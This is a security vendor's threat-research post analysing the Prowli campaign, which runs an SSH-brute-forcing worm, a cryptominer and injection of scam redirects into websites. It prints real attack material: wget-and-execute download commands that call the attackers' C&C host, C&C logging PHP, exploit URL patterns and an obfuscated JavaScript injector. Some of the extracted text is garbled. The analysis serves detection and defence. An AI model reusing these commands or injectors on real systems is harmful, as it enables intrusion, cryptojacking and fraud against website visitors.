# OPERATION PROWLI: MONETIZING 40,000 VICTIM MACHINES #####  June 6, 2018  BY OFRI ZIV DANIEL GOLDBERG MOR ##### MATALON  1 COMMENT **[PRODUCT](https://www.guardicore.com/workload-protection-hybrid-cloud/)** **[USE CASES](https://www.guardicore.com/use-cases/)** **[PARTNERS](https://www.guardicore.com/partners/)** **[COMPANY](https://www.guardicore.com/company/)** **[RESOURCES](https://www.guardicore.com/resources/)** **[BLOG](https://www.guardicore.com/blog/)** **[SUPPORT](https://www.guardicore.com/support/)** **[LABS](https://www.guardicore.com/labs/)** **[Get a Demo](http://www.guardicore.com/request-a-demo/)** ----- ####     Guardicore Labs team has uncovered a traffic manipulation and cryptocurrency mining campaign infecting a wide number of organizations in industries such as finance, education and government. This campaign, dubbed **Operation Prowli, spreads malware and malicious code to servers and websites and has compromised more** than 40,000 machines in multiple areas of the world. Prowli uses various attack techniques including exploits, password brute-forcing and weak configurations. This multi-purpose operation targets a variety of platforms – CMS servers hosting popular websites, backup servers running HP Data Protector, DSL modems and IoT devices. Victim machines are monetised using a variety of methods relying on internet trends such as digital currencies and traffic redirection Traffic monetisation ----- p, y g g the traffic monetizer to the scam operator. In this report, we focus on the attackers’ techniques, methodologies, infrastructure and goals. We will dive into the technical details and the way the money flows. A list of indicators of compromise (IOCs) related to the operation is provided at the end of the post. ## Discovering the r2r2 worm On the 4th of April, the GuardiCore Global Sensor Network (GGSN) reported a group of SSH attacks communicating with a C&C server. The attacks all behaved in the same fashion, communicating with the same C&C server to download a number of attack tools named r2r2 along with a cryptocurrency miner. _Some of the attackers’ steps as recorded by GGSN_ ----- known datasets such as VirusTotal The attackers used binaries with the same domain name hardcoded in the code and each of the binaries was designed to attack different services and CPU architectures Over a period of 3 weeks, we captured dozens of such attacks per day coming from over 180 IPs from a variety of countries and organizations. These attacks led us to investigate the attackers’ infrastructure and discover a wide ranging operation attacking multiple services. ## Scope We found that the attackers store a large collection of victim machines with IPs and domains that expose different services to the Internet. These services are all either vulnerable to remote pre-authentication attacks or allow the attackers to bruteforce their way inside. The list of targeted services includes Drupal CMS websites, WordPress sites, DSL modems, servers with an open SSH port, vulnerable IoT devices, servers exposing HP Data Protector software and more. ----- _Most of the victims ran with weak SSH credentials_ The attackers behind Operation Prowli assaulted organizations of all types and sizes which is in line with [previous attacks we investigated.](https://www.guardicore.com/2017/05/the-bondnet-army/) ----- _p_ Operation Prowli has compromised a wide range of services, without targeting a specific sector. _Victims by Industry_ ----- espionage. We currently understand two key flows of revenue in this operation. The first source of revenue comes from cryptocurrency mining. Typically, cryptocurrency mining is considered a resource-heavy operation that involves a large upfront investment followed by ongoing traffic and energy costs. The attackers behind Prowli incur no expenses when they use r2r2 to take over computers owned by others and use mining pools to launder their gains. Cryptocurrency is a common payload of modern worms, and in this case ----- website operators such as the Prowli attackers and redirect it to domains on demand. Website operators earn money per traffic sent through roi777. The destination domains frequently host different scams, such as fake services, malicious browser extensions and more. _An example of a fake website visitors are redirected to_ This is a dirty business and typically, all three sides, buyers and sellers of traffic and the middlemen, engaging in illicit activity. In our case, Prowli sells traffic by redirecting visitors from compromised legitimate websites to d i h ti t h t f k b t i d t d Th t ffi ti ----- the “legitimate” part of the website, listing users, bitcoin wallet addresses, telegram IDs etc, providing a dataset of who is using the traffic redirection service. ## What’s Under Attack? Operation Prowli operators maintain a toolbox with a variety of attack methods to fit their needs. We’ve seen different types of attacks, each based on a different service. Some attacks are based on worms that randomly attack IPs in the internet, while others targeting CMS servers use a master list of targets. A partial list of the attack vectors we’ve seen include: Machines running SSH are hacked by a self propagating worm spread by brute force credential guessing, the victims download and run a cryptocurrency miner. [Joomla! Servers running the K2 extension are attacked with file download vulnerability, using a URL such as](https://extensions.joomla.org/extension/k2/) _http://.com/index.php?option=com_k2&view=media&task=connector&cmd=file&target=[base64 of file_ _path]&download=1_ This provides the attackers sensitive server configuration data such as passwords and API keys. ----- _Joomla! Configuration details_ A variety of DSL modems are hacked by accessing their internet facing configuration panel using a URL such [as http://:7547/UD/act?1 and passing in parameters exploiting a known vulnerability. The vulnerability](https://blog.rapid7.com/2016/11/29/on-the-recent-dsl-modem-vulnerabilities/) resides in the processing of SOAP data and allows remote code execution. This vulnerability was previously [used by the Mirai worm.](https://isc.sans.edu/forums/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759) WordPress servers are hacked by a variety of infectors – some attempt to brute force login into the WP administrative panel, others exploit old vulnerabilities in WordPress installations. A third type of attacks searches for servers with configuration problems, such as exposing FTP credentials when accessing http://.com/wp-config.php~. Servers running HP Data Protector exposed to the internet (over port 5555) are exploited using a 4 year old [vulnerability – CVE-2014-2623 used to execute commands with system privileges.](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2623) The attackers also target systems with Drupal, PhpMyAdmin installations, NFS boxes and servers with exposed SMB ports open to brute force credential guessing. An additional type of victims are compromised servers which host a well known open source webshell named [“WSO Web Shell”.](https://scottlinux.com/2013/04/06/wso-web-shell-php-shell-used-by-hackers/) ----- _Complete control of infected machines_ These php-based shells provide access and remote code execution on different compromised machines, frequently running vulnerable versions of WordPress. ----- _Easy for the attacker to use the machines for further attacks_ We believe that these webshells are used by the attackers as pivot points. They provide a reliable platform to run scanning and attack scripts. ## Bruteforce for the win Let’s take a closer look at the brute force SSH attack that tipped us off to this operation. The binary named r2r2 [is written in Golang. A quick look showed that r2r2 randomly generates IP address blocks and iteratively tries to](https://golang.org/) brute force SSH logins with a user/password dictionary. Once it breaks in, it runs a series of commands on the victim. These commands run wget to download files from a hard coded server: Multiple copies of the worm for different CPU architectures A cryptocurrency miner and configuration file ----- _The worm runs commands on remote victims and then reports credentials to a C2 server_ ----- cd /tmp;wget O r2r2 h[]://wp.startreceive.tk/tdest/z/r2r2;chmod 777 r2r2;./r2r2 > /dev/null 2>&1 & cd /tmp;wget -O r2r2-a h[]://wp.startreceive.tk/test/z/r2r2-a;chmod 777 r2r2-a;./r2r2-a > /dev/null 2>&1 & cd /tmp;wget -O r2r2-m h[]://wp.startreceive.tk/test/z/r2r2-m;chmod 777 r2r2-m;./r2r2-m > /dev/null 2>&1 cd /tmp;wget -O xm111 h[]://wp.startreceive.tk/test/z/xm111;chmod 777 xm111;wget -O config.json h[]://wp.startreceive.tk/test/z/config.json;chmod 777 config.json;./xm111 > /dev/null 2>&1 The different versions of the r2r2 binary, r2r2, r2r2-a and r2r2-m are the same binary compiled for different platforms, x86, ARM and MIPS respectively. ###  ----- _From the binary we also extracted strings helping us name the attackers_ After breaking into the server, the credentials used to login to the victim are transmitted over plaintext HTTP to wp.startreceive[.]tk/test/p.php and logged in the attackers server. Some versions of the worm send more details about the victims such as CPU, kernel dist version, etc. ## Joomla!.tk C&C The attackers’ attack tools report to a C&C server running under the domain name wp.startreceive[.]tk. This [Joomla! server is a compromised server, which the attackers reuse to track their malware, collect information](https://www.joomla.org/) from the ever growing victims list and also serve different payloads to compromised machines. The C&C logic is implemented by a group of PHP files who receive data on victims from the relevant infectors and store the details. The victims are catalogued by exploitation method with all the details needed to allow the attackers to access them again at any given time. if ( isset ($_GET[‘p’ ])) { $myfile = file_put_contents( ‘ip2_log.txt’, $ip. “||” .$_GET[ ‘p’ ].PHP_EOL, FILE_APPEND | LOCK_EX); } elseif ( isset ($_GET[‘p1’])){ ----- } else { if ( isset ($_GET[ ‘p2’ ])){ $myfile = file_put_contents( ‘ip4_log.txt’, $ip. “||” .$_GET[ ‘p2’ ].PHP_EOL, FILE_APPEND | LOCK_EX); } } if ( isset ($_GET[ ‘t1’ ])) { $myfile = file_put_contents( ‘mhcl_log.txt’, $ip.PHP_EOL, FILE_APPEND | LOCK_EX); } if ( isset ($_GET[ ‘t2’ ])) { $myfile = file_put_contents( ‘dru_log.txt’, $_GET[ ‘t2’ ].PHP_EOL, FILE_APPEND | LOCK_EX); } _A snippet from the attackers C&C code_ For every targeted service, victim data is stored in a log file with all the data the attacker needs to regain access to the machine. For example: WordPress administration panel – Login credentials ----- WordPress weak configuration – URL exposing FTP credentials [DSL modems – URL exposing vulnerable configuration panels](https://blog.rapid7.com/2016/11/29/on-the-recent-dsl-modem-vulnerabilities/) [Webshell – A URL hosting “WSO Web Shell” and credentials](https://scottlinux.com/2013/04/06/wso-web-shell-php-shell-used-by-hackers/) _A snippet from a log file detailing accessible WordPress MySQL databases_ ## Show me the payload The attackers behind Operation Prowli use different payloads for each of their targets. The SSH brute force attack provides the attackers with complete control of the system and are used to mine cryptocurrency, while breached websites are used to run different Web frauds. Other victims are picked by the attackers to execute more attacks, similar to how the server behind wp.startreceive[.]tk was used as a C&C server. A significant part of this operation infects websites that run vulnerable CMS software. In some cases, the payload is a PHP file that infects the website and injects code into different PHP pages and JavaScript files. ----- _Part of a PHP file executed on a vulnerable server_ The PHP injector function php_in checks whether the targeted PHP file outputs HTML and if it does, injects a snippet of JavaScript code into the generated page. This snippet starts a process that ends with innocent website visitors redirected to a malicious website. ----- _The Prowli attackers intermediate between infected websites and roi777_ ----- provided URL. We believe that the send.php page belongs to roi777 and is being used by Prowli as the integration point between roi777’s infrastructure and “website operators”. To make sure roi777 doesn’t track the list of websites controlled by Prowli operators, the Prowli code injector script uses a redirect website (stats.startreceive[.]tk) on which the send.php page is hosted rather than injecting the code into infected websites. _Before and after the redirector script is deobfuscated_ The send.php page retrieves the target domain name to which the victim is later redirected to from roi777[.]com. ----- _An example of a tech support scam visitors are redirected to_ To sum it up, Prowli takes over legitimate websites and turns them, without their knowing, into redirectors of traffic towards malicious websites, some of which are simple scams, others reference tech support scams. ## Detection & Prevention The attacks are based on a mix of known vulnerabilities and credential guessing. This means prevention should ----- y For CMS software, if routine patching or external hosting is not a solution, assume at some point it will be [hacked and follow strict hardening guides. The major CMS vendors WordPress and Drupal provide hardening](https://codex.wordpress.org/Hardening_WordPress) guides. For example, a locked down WordPress installation would have prevented attackers from modifying files [with their injected code. For general purpose PHP websites, OWASP provides a hardened PHP configuration.](https://www.owasp.org/index.php/PHP_Configuration_Cheat_Sheet) Segmentation is a good practice and since you can’t always prevent the breach, you should segment and monitor [your network to minimise harm and avoid infamous breaches such as the fish tank breach. Routinely review who](https://thehackernews.com/2018/04/iot-hacking-thermometer.html) and what can access the servers. Keep this list to a minimum and pay special attention to IoT devices whose credentials cannot be changed. Monitoring connections would easily show compromised devices communicating with cryptocurrency mining pools. ##### R2R2 infected machines If you have an infected machine with r2r2, stopping the worm & miner processes (r2r2 and xm11) and deleting the files will suffice to clean up the attack. Don’t forget to change passwords after the cleanup. You can detect these machines by looking for high CPU usage or an abnormal amount of outgoing SSH connections to unknown IPs. ##### Detect visitors of Prowli infected websites Discovering if any of the computers in your network has visited an infected website can be done by examining network traffic and searching for traffic to wp.startreceive[.]tk and stats.startreceive[.]tk. Machines that tried to resolve one of these domains, have previously visited an infected website. We advise you to make sure users have not installed any malicious software or were exploited by common browser vulnerabilities. Also, it might be worth to search for domains ending in .tk. While there are legitimate web sites under that gTLD, according to this [research, phishing domains are incredibly common under this register.](http://docs.apwg.org/reports/APWG_Global_Phishing_Report_2015-2016.pdf) ----- eval(String.fromCharCode(118, 97, 114, 32, 122, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 34, 115, 99, 114, 105, 112, 116, 34, 41, 59, 32, 122, 46, 116, 121, 112, 101, 32, 61, 32, 34, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 34, 59, 32, 122, 46, 115, 114, 99, 32, 61, 32, 34, 104, 116, 116, 112, 115, 58, 47, 47, 115, 116, 97, 116, 115, 46, 115, 116, 97, 114, 116, 114, 101, 99, 101, 105, 118, 101, 46, 116, 107, 47, 115, 99, 114, 105, 112, 116, 46, 106, 115, 63, 100, 114, 61, 49, 34, 59, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 104, 101, 97, 100, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 122, 41, 59)); PHP files: If you find these snippets or similar pieces of code, you should assume the website is compromised and start from a clean slate. ## Conclusion GuardiCore Labs investigation revealed how the Prowli attackers have monetized their malicious activity using cryptocurrency mining and traffic hijacking. They breached unsecured machines to get Monero using a fully automated worm, and infected compromised websites to redirect their visitors to malicious domains. We also tied this operation to the roi777 traffic “monetization” organisation that has been active for quite some time. Prowli has compromised tens of thousands of machines by exploiting unsecured websites and servers. Simple but efficient attacks can get you very far in today’s internet and it’s not just unsecured IoT devices; Large parts of the internet consist of unmaintained systems, unpatched and left with default credentials are targeted. While cryptocurrency mining and traffic manipulation are the main uses of the compromised machines we’ve seen, the attackers keep all their options open. By leaving backdoors and collecting victim metadata, the ----- ## Indicators of Compromise ##### Files filename hash r2r2 r2r2-a r2r2-m r345 r345-a r345-m xm111 cl1 z.exe pro-wget pro-s2 ##### Domains startreceive[.]tk |Files|Col2| |---|---| |filename|hash| |r2r2|128582a05985d80af0c0370df565aec52627ab70dad3672702ffe9bd872f65d8| |r2r2-a|09fa626ac488bca48d94c9774d6ae37d9d1d52256c807b6341f0a08bdd722abf| |r2r2-m|908a91a707a3a47f9d4514ecdb9e43de861ffa79c40202f0f72b4866fb6c23a6| |r345|51f9b87efd00d3c12e4d73524e9626bfeed0f4948781a6f38a7301b102b8dbbd| |r345-a|cfb8f536c7019d4d04fb90b7dce8d7eefaa6a862a85c523d869912a1fbaf946a| |r345-m|88d03f514b2c36e06fd3b7ed6e53c7525a8e8370c4df036b3b96a6da82c8b45b| |xm111|b070d06a3615f3db67ad3beab43d6d21f3c88026aa2b4726a93df47145cd30ec| |cl1|7e6cadbfad7147d78fae0716cadb9dcb1de7c4a392d8d72551c5301abe11f2b2| |z.exe|a0a52dc6cf98ad9c9cb244d810a22aa9f36710f21286b5b9a9162c850212b160| |pro-wget|a09248f3a4d7e58368a1847f235f0ceb52508f29067ad27a36a590dc13df4b42| |pro-s2|3e5b3a11276e39821e166b5dbf6414003c1e2ecae3bdca61ab673f23db74734b| ----- minexmr.com ##### Emails richard.melony[]openmailbox[]org ##### IPs 185.212.128.154 **[Tags: cryptocurrency mining, cyber attack, malware](https://www.guardicore.com/tag/cryptocurrency-mining/)** **Loki** June 6, 2018 at 9:32 am hot shit [Reply](https://www.guardicore.com/2018/06/operation-prowli-traffic-manipulation-cryptocurrency-mining/?replytocom=1718#respond) ##### Leave a Comment COMMENT Want to join the discussion? Feel free to contribute! ----- **Name *** **Email *** #### POST COMMENT #### LATEST POSTS ##### AZURE PASSWORDS ARE STILL AT RISK; INFECTION MONKEY CAN HELP ##### RECOVERING PLAINTEXT PASSWORDS FROM AZURE VIRTUAL MACHINES LIKE IT’S THE 1990S ----- #####     [HOME](https://www.guardicore.com/) | [PRODUCT](https://www.guardicore.com/workload-protection-hybrid-cloud/) | [USE CASES](https://www.guardicore.com/use-cases/) | [PARTNERS](https://www.guardicore.com/partners/) | [COMPANY](https://www.guardicore.com/company/) | [RESOURCES](https://www.guardicore.com/resources/) | [BLOG](https://www.guardicore.com/blog/) | [SUPPORT](https://www.guardicore.com/support/) | NEWS & PRESS | [CONTACT US](https://www.guardicore.com/contact-us/) | [CUSTOMER PORTAL](https://customers.guardicore.com/) | [TERMS OF USE](https://www.guardicore.com/website-terms-of-use/) | [PRIVACY POLICY](https://www.guardicore.com/privacy-policy/) | [LABS](https://www.guardicore.com/labs/) © 2018 GuardiCore -----